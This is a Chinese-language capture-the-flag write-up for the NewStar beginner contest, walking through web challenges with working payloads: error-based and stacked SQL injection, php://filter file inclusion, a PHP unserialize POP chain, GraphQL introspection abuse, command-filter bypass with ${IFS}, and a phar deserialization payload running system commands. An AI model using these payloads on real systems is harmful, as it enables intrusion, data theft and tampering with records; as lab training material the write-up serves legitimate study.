萌新赛(NewStar)

如有侵权，请联系我，立即删除。 

最近的这个“萌新”，赛感觉很有必要记录一下。

目录

Word-For-You(2 Gen)

 IncludeOne

UnserializeOne

ezAPI

第三周

multiSQL

IncludeTwo

$_SERVER['argv']#是通过+作为分隔符的

Word-For-You(2 Gen)

第一周的时候就是一个万能密码，这是第二周有了一点的提示，当时我困在这里尝试了很多闭合的方式 '  "等等，也是报错注入用到的不是特别的多，所以每次都不能快速的用到。

1' or updatexml(1,concat(0x7e,database()),1) # 

当时也是做到这里了，但是

 这里有东西被挡住了，我以为是一些报错所以就没太留意，唉

 这不就爆出来数据库名

1' or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database())),1)#

查询到了四个数据库表，猜一下是不是wfy_admin 

1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="wfy_admin")),1)#

 1' or updatexml(1,concat(0x7e,(select group_concat(username,password) from wfy_admin)),1)#

 说明数据库表不正确，换个表继续

最后没记错flag好像在 wfy_comments 这个表里的text下

 1' or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name="wfy_comments")),1)#

最终在text字段

1' or updatexml(1,concat(0x7e,(select group_concat(text) from wfy_comments)),1)#

 感觉是限制了长度，后面应该还有东西，没准flag就在最后 所以我们倒序一下

1' or updatexml(1,concat(0x7e,(select reverse(group_concat(text)) from wfy_comments)),1)#

 猜测正确，果然是输出长度进行了限制我们在对这个字符串进行求反操作就可

s='}sr0rre_emos_ek2m_t4uJ{galf'print(s[::-1])

 IncludeOne

if(isset($_POST['guess']) && md5($_POST['guess']) === md5(mt_rand())){    if(!preg_match("/base|\.\./i",$_GET['file']) && preg_match("/NewStar/i",$_GET['file']) && isset($_GET['file'])){        //flag in `flag.php`        include($_GET['file']);

 这道题相对比较简单，就是点一下就过了，首先是随机种子会有一定的顺序

然后这里禁了base,并且正则要求命令中必须含有NewStar，

?file=php://filter/NewStar/read=string.rot13/resource=flag.php

 这里Newstar没起到任何的作用，然后将flag.php中的数据进行了，rot13编码，最后解码就可

UnserializeOne

name;    }    public function __isset($var)    {        ($this->func)();    }}class Sec{    private $obj;    private $var;    public function __toString()    {        $this->obj->check($this->var);        return "CTFers";    }    public function __invoke()    {        echo file_get_contents('/flag');    }}class Easy{    public $cla;    public function __call($fun, $var)    {        $this->cla = clone $var[0];    }}class eeee{    public $obj;    public function __clone()    {        if(isset($this->obj->cmd)){            echo "success";        }    }}if(isset($_POST['pop'])){    unserialize($_POST['pop']);}

pop链的题目，首先我们先锁定链尾

  public function __invoke()
    {
        echo file_get_contents('/flag');
    }看到这里读取/flag，然后往上面找触发invoke

public function __isset($var)
    {
        ($this->func)();
    }

  public function __clone()
    {
        if(isset($this->obj->cmd)){
            echo "success";
        }
    }

class Easy{
    public $cla;

    public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }
}

然后看到tostring  , destruct 

直接写出

Start::destruct-->Sec::-->toString-->Easy::call-->eeee::clone-->Start::isset-->Sec::invoke

name=$s1;$s1->obj= $E;$s1->var=$e1;$e1->obj=$S1;$S1->func=$s2;echo (serialize($S));

这里虽然有protected定义的私有变量，在php 7.1+可以换成 public,

public function __toString()
    {
        $this->obj->check($this->var);
        return "CTFers";
    }

public function __call($fun, $var)
    {
        $this->cla = clone $var[0];
    }

这要是在这卡了我一会，this->obj 等于 call的类，然后this-var也需要在上面的类赋值，因为下面的形参有两个，this->var的类就是call触发下面的类

ezAPI

qsdz开发了一个查询网页，但是好像存在一些漏洞？

这里看了师傅的wp才知道是graphql，第一次接触

graphQL常见的是这种形式以后碰见就可以用到

一般考察的是，内省查询，就是本来只应该内部进行访问，但配置错误导致攻击者可以获得这些消息。

内省查询的数据为

{"query":"\n    query IntrospectionQuery {\r\n      __schema {\r\n        queryType { name }\r\n        mutationType { name }\r\n        subscriptionType { name }\r\n        types {\r\n          ...FullType\r\n        }\r\n        directives {\r\n          name\r\n          description\r\n          locations\r\n          args {\r\n            ...InputValue\r\n          }\r\n        }\r\n      }\r\n    }\r\n\r\n    fragment FullType on __Type {\r\n      kind\r\n      name\r\n      description\r\n      fields(includeDeprecated: true) {\r\n        name\r\n        description\r\n        args {\r\n          ...InputValue\r\n        }\r\n        type {\r\n          ...TypeRef\r\n        }\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      inputFields {\r\n        ...InputValue\r\n      }\r\n      interfaces {\r\n        ...TypeRef\r\n      }\r\n      enumValues(includeDeprecated: true) {\r\n        name\r\n        description\r\n        isDeprecated\r\n        deprecationReason\r\n      }\r\n      possibleTypes {\r\n        ...TypeRef\r\n      }\r\n    }\r\n\r\n    fragment InputValue on __InputValue {\r\n      name\r\n      description\r\n      type { ...TypeRef }\r\n      defaultValue\r\n    }\r\n\r\n    fragment TypeRef on __Type {\r\n      kind\r\n      name\r\n      ofType {\r\n        kind\r\n        name\r\n        ofType {\r\n          kind\r\n          name\r\n          ofType {\r\n            kind\r\n            name\r\n            ofType {\r\n              kind\r\n              name\r\n              ofType {\r\n                kind\r\n                name\r\n                ofType {\r\n                  kind\r\n                  name\r\n                  ofType {\r\n                    kind\r\n                    name\r\n                  }\r\n                }\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }\r\n  ","variables":null}

 这样就会返回所有API端点的所有信息

玩转graphQL

 array(            'method' => 'POST',            'header' => 'Content-type: application/json',            'content' => $data,            'timeout' => 10 * 60        )    );    $context = stream_context_create($options);    $result = file_get_contents("http://graphql:8080/v1/graphql", false, $context);    return $result;}if(isset($id)){    if(waf($id)){        isset($_POST['data']) ? $data=$_POST['data'] : $data='{"query":"query{\nusers_user_by_pk(id:'.$id.') {\nname\n}\n}\n", "variables":null}';        $res = json_decode(send($data));        if($res->data->users_user_by_pk->name !== NULL){            echo "ID: ".$id."
Name: ".$res->data->users_user_by_pk->name;        }else{            echo "Can't found it!
DEBUG: ";            var_dump($res->data);        }    }else{        die("Hacker!");    }}else{    die("No Data?");}?>

这里发现post传入的data是可控的，所以可以是内省查询的注入点 

 这里找到了一个flag的接口，可是怎末读它呢

看到源码给出了这一条命令，那我们进行模仿一下

$data = '{"query":"query{\nusers_user_by_pk(id:' . $id . ') {\nname\n}\n}\n", "variables":null}'

 读取成功flag的接口，获得flag!

第三周

 第三周web

multiSQL

第三周打开以后，感觉难了好多好多

听说火华师傅四级又挂掉了，他不好给他的英语老师交代，你能帮他改改成绩通过学校的验证嘛～

题目给了人名火华

425通过，可是加起来是424

当时我的思路，就是进行update直接更新，然后堆叠注入查出来表名         

首先试出来闭合方式，只有'单引号的返回结果不一样

然后使用update发现被过滤掉了！！！

尝试了绕过方式过不去，然后就想想想如果用insert插入一条记录是不是也可以

呃呃呃，insert也被过滤了

只能百度搜索，replace  into table (id,name) values('1','aa'),('2','bb') 

发现这个也是插入的语句

1';replace into score values ("火华",50,200,200);)

然后命令框输入火华查询记录，

 有了两条记录，这时候删除第一条不就可以了吗

1';delete from score where listen=11;

 点击上面获得flag

IncludeTwo

|`|\/| |\\\\|\*/i',$_GET["cmd"])){       echo "Don't Hack Me";    }else{        system($_GET["cmd"]);    }}else{    show_source(__FILE__);}

?cmd=cd${IFS}..${IFS}%26%26${IFS}cd${IFS}..%26%26${IFS}cd${IFS}..%26%26rev${IFS}fff?llllaaaaggggg

|<|\?|php|".urldecode("%0a")."/i",$this->cmd)){            //Same point ,can you bypass me again?            eval("#".$this->cmd);        }else{            echo "No!";        }    }}file_exists($_GET['file']);

cmd=urldecode("%0d")."system('cat f*');";$phar = new Phar('ee.phar');$phar->startBuffering();$phar->setStub('GIF89a'.'');$phar->setMetadata($a);$phar->addFromString('test.txt', 'test');$phar->stopBuffering();?>